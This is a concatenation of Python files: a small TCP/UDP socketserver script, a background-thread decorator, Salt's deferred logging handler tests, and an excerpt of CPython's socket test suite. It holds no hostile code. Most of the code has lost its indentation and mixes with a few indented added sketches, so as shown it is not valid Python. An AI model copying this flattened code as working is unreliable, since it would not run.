server = socketserver.TCPServer((host, port), MyTCPHandler)
try:
print('start tcp server')
server.serve_forever()
except Exception as e:
print(e)
def udp_task(host, port):
print(host, port)
server = socketserver.UDPServer((host, port), MyUDPHandler)
try:
print('start udp server')
server.serve_forever()
except Exception as e:
print(e)
if __name__ == "__main__":
HOST, PORT = "127.0.0.1", 8888
executor = ThreadPoolExecutor()
# p1 = Process(target=tcp_task, args=(HOST, PORT,))
# p1.start()
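    # Run the TCP and UDP servers concurrently in executor threads. They can
    # both use port 8888 because TCP and UDP ports are separate namespaces.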
a = executor.submit(tcp_task, HOST, PORT)
b = executor.submit(udp_task, HOST, PORT)
#
# p = Process(target=udp_task, args=(HOST, PORT,))
#
# p.start()
# p.join()
# with socketserver.UDPServer((HOST, PORT), MyUDPHandler) as server:
# print('start udp server')
# server.serve_forever()
# while True:
# time.sleep(1)
|
thread.py
|
from functools import wraps
from threading import Thread

def async_func(func):
    """Run the decorated function asynchronously in a background thread."""
    @wraps(func)
    def wrapper(*args, **kwargs):
        thread = Thread(target=func, args=args, kwargs=kwargs)
        thread.start()
        return thread  # let callers join() the thread if they need to wait
    return wrapper
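
# Example usage (a minimal sketch, not part of the original module):
if __name__ == "__main__":
    import time

    @async_func
    def background_job(name, delay=0.5):
        time.sleep(delay)
        print(name, "finished")

    background_job("demo")  # returns immediately; the job runs in its own thread
    print("main thread keeps going")
    time.sleep(1)  # pause so the demo output appears before the script ends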
|
test_deferred_stream_handler.py
|
import logging
import multiprocessing
import signal
import subprocess
import sys
import time
import pytest
from salt._logging.handlers import DeferredStreamHandler
from salt.utils.nb_popen import NonBlockingPopen
from saltfactories.utils.processes import terminate_process
from tests.support.helpers import CaptureOutput, dedent
from tests.support.runtests import RUNTIME_VARS
log = logging.getLogger(__name__)
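
# As exercised by the tests below, DeferredStreamHandler buffers log records
# in memory and only writes them to the underlying stream once it is flushed
# or synced with other handlers (including the implicit flush at exit).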
def _sync_with_handlers_proc_target():
with CaptureOutput() as stds:
handler = DeferredStreamHandler(sys.stderr)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(message)s")
handler.setFormatter(formatter)
logging.root.addHandler(handler)
logger = logging.getLogger(__name__)
logger.info("Foo")
logger.info("Bar")
logging.root.removeHandler(handler)
assert not stds.stdout
assert not stds.stderr
stream_handler = logging.StreamHandler(sys.stderr)
# Sync with the other handlers
handler.sync_with_handlers([stream_handler])
assert not stds.stdout
assert stds.stderr == "Foo\nBar\n"
def _deferred_write_on_flush_proc_target():
with CaptureOutput() as stds:
handler = DeferredStreamHandler(sys.stderr)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(message)s")
handler.setFormatter(formatter)
logging.root.addHandler(handler)
logger = logging.getLogger(__name__)
logger.info("Foo")
logger.info("Bar")
logging.root.removeHandler(handler)
assert not stds.stdout
assert not stds.stderr
# Flush the handler
handler.flush()
assert not stds.stdout
assert stds.stderr == "Foo\nBar\n"
def test_sync_with_handlers():
proc = multiprocessing.Process(target=_sync_with_handlers_proc_target)
proc.start()
proc.join()
assert proc.exitcode == 0
def test_deferred_write_on_flush():
proc = multiprocessing.Process(target=_deferred_write_on_flush_proc_target)
proc.start()
proc.join()
assert proc.exitcode == 0
def test_deferred_write_on_atexit(tmp_path):
# Python will .flush() and .close() all logging handlers at interpreter shutdown.
# This should be enough to flush our deferred messages.
pyscript = dedent(
r"""
import sys
import time
import logging
CODE_DIR = {!r}
if CODE_DIR in sys.path:
sys.path.remove(CODE_DIR)
sys.path.insert(0, CODE_DIR)
from salt._logging.handlers import DeferredStreamHandler
# Reset any logging handlers we might have already
logging.root.handlers[:] = []
handler = DeferredStreamHandler(sys.stderr)
handler.setLevel(logging.DEBUG)
logging.root.addHandler(handler)
log = logging.getLogger(__name__)
sys.stdout.write('STARTED\n')
sys.stdout.flush()
log.debug('Foo')
sys.exit(0)
""".format(
RUNTIME_VARS.CODE_DIR
)
)
script_path = tmp_path / "atexit_deferred_logging_test.py"
script_path.write_text(pyscript, encoding="utf-8")
proc = NonBlockingPopen(
[sys.executable, str(script_path)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
out = b""
err = b""
# This test should never take more than 5 seconds
execution_time = 5
max_time = time.time() + execution_time
try:
# Just loop consuming output
while True:
if time.time() > max_time:
pytest.fail("Script didn't exit after {} second".format(execution_time))
time.sleep(0.125)
_out = proc.recv()
_err = proc.recv_err()
if _out:
out += _out
if _err:
err += _err
if _out is None and _err is None:
# The script exited
break
if proc.poll() is not None:
# The script exited
break
finally:
terminate_process(proc.pid, kill_children=True)
if b"Foo" not in err:
pytest.fail("'Foo' should be in stderr and it's not: {}".format(err))
@pytest.mark.skip_on_windows(reason="Windows does not support SIGINT")
def test_deferred_write_on_sigint(tmp_path):
pyscript = dedent(
r"""
import sys
import time
import signal
import logging
CODE_DIR = {!r}
if CODE_DIR in sys.path:
sys.path.remove(CODE_DIR)
sys.path.insert(0, CODE_DIR)
from salt._logging.handlers import DeferredStreamHandler
# Reset any logging handlers we might have already
logging.root.handlers[:] = []
handler = DeferredStreamHandler(sys.stderr)
handler.setLevel(logging.DEBUG)
logging.root.addHandler(handler)
if signal.getsignal(signal.SIGINT) != signal.default_int_handler:
# Looking at you Debian based distros :/
signal.signal(signal.SIGINT, signal.default_int_handler)
log = logging.getLogger(__name__)
start_printed = False
while True:
try:
log.debug('Foo')
if start_printed is False:
sys.stdout.write('STARTED\n')
sys.stdout.write('SIGINT HANDLER: {{!r}}\n'.format(signal.getsignal(signal.SIGINT)))
sys.stdout.flush()
start_printed = True
time.sleep(0.125)
except (KeyboardInterrupt, SystemExit):
log.info('KeyboardInterrupt caught')
sys.stdout.write('KeyboardInterrupt caught\n')
sys.stdout.flush()
break
log.info('EXITING')
sys.stdout.write('EXITING\n')
sys.stdout.flush()
sys.exit(0)
""".format(
RUNTIME_VARS.CODE_DIR
)
)
script_path = tmp_path / "sigint_deferred_logging_test.py"
script_path.write_text(pyscript, encoding="utf-8")
proc = NonBlockingPopen(
[sys.executable, str(script_path)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
out = b""
err = b""
    # The test should take way less than this timeout (in seconds)
execution_time = 10
start = time.time()
max_time = time.time() + execution_time
try:
signalled = False
log.info("Starting Loop")
while True:
time.sleep(0.125)
_out = proc.recv()
_err = proc.recv_err()
if _out:
out += _out
if _err:
err += _err
if b"STARTED" in out and not signalled:
# Enough time has passed
proc.send_signal(signal.SIGINT)
signalled = True
log.debug("Sent SIGINT after: %s", time.time() - start)
if signalled is False:
if out:
pytest.fail(
"We have stdout output when there should be none: {}".format(
out
)
)
if err:
pytest.fail(
"We have stderr output when there should be none: {}".format(
err
)
)
if _out is None and _err is None:
log.info("_out and _err are None")
if b"Foo" not in err:
pytest.fail(
"No more output and 'Foo' should be in stderr and it's not: {}".format(
err
)
)
break
if proc.poll() is not None:
log.debug("poll() is not None")
if b"Foo" not in err:
pytest.fail(
"Process terminated and 'Foo' should be in stderr and it's not: {}".format(
err
)
)
break
if time.time() > max_time:
log.debug("Reached max time")
if b"Foo" not in err:
pytest.fail(
"'Foo' should be in stderr and it's not:\n{0}\nSTDERR:\n{0}\n{1}\n{0}\nSTDOUT:\n{0}\n{2}\n{0}".format(
"-" * 80, err, out
)
)
finally:
terminate_process(proc.pid, kill_children=True)
log.debug("Test took %s seconds", time.time() - start)
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
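    """Return the local AF_VSOCK context ID (CID), or None if it cannot be
    determined (e.g. no fcntl support or /dev/vsock is unavailable)."""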
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
HAVE_SOCKET_UDPLITE = hasattr(socket, "IPPROTO_UDPLITE")
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPLITETest(SocketUDPTest):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
self.port = support.bind_port(self.serv)
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
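

# A minimal sketch (not part of the original test suite) of packing and
# unpacking a raw CAN frame with the format described in SocketCANTest above.
# The helper names are illustrative only.
def _example_pack_can_frame(can_id, data):
    """Pack a can_frame using SocketCANTest.can_frame_fmt ("=IB3x8s")."""
    can_dlc = len(data)
    data = data.ljust(8, b'\x00')
    return struct.pack(SocketCANTest.can_frame_fmt, can_id, can_dlc, data)


def _example_unpack_can_frame(frame):
    """Unpack a 16-byte can_frame produced by _example_pack_can_frame()."""
    can_id, can_dlc, data = struct.unpack(SocketCANTest.can_frame_fmt, frame)
    return can_id, can_dlc, data[:can_dlc]
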
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
    connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class ThreadedUDPLITESocketTest(SocketUDPLITETest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPLITETest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
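

# A minimal sketch (not part of the original test suite) of the mixin
# combination described in the comment above SocketTestBase: pairing
# ConnectedStreamTestMixin with TCPTestBase gives a connected TCP
# client/server fixture analogous to SocketConnectedTest. The class name is
# illustrative only.
class _ExampleConnectedTCPTest(ConnectedStreamTestMixin, TCPTestBase):

    def testEcho(self):
        # Server side: read what the client thread sent over the connection.
        self.assertEqual(self.cli_conn.recv(1024), MSG)

    def _testEcho(self):
        # Client side: send the module-level test message.
        self.serv_conn.sendall(MSG)
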
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class UDPLITETestBase(InetTestBase):
"""Base class for UDPLITE-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
class UDPLITE6TestBase(Inet6TestBase):
"""Base class for UDPLITE-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
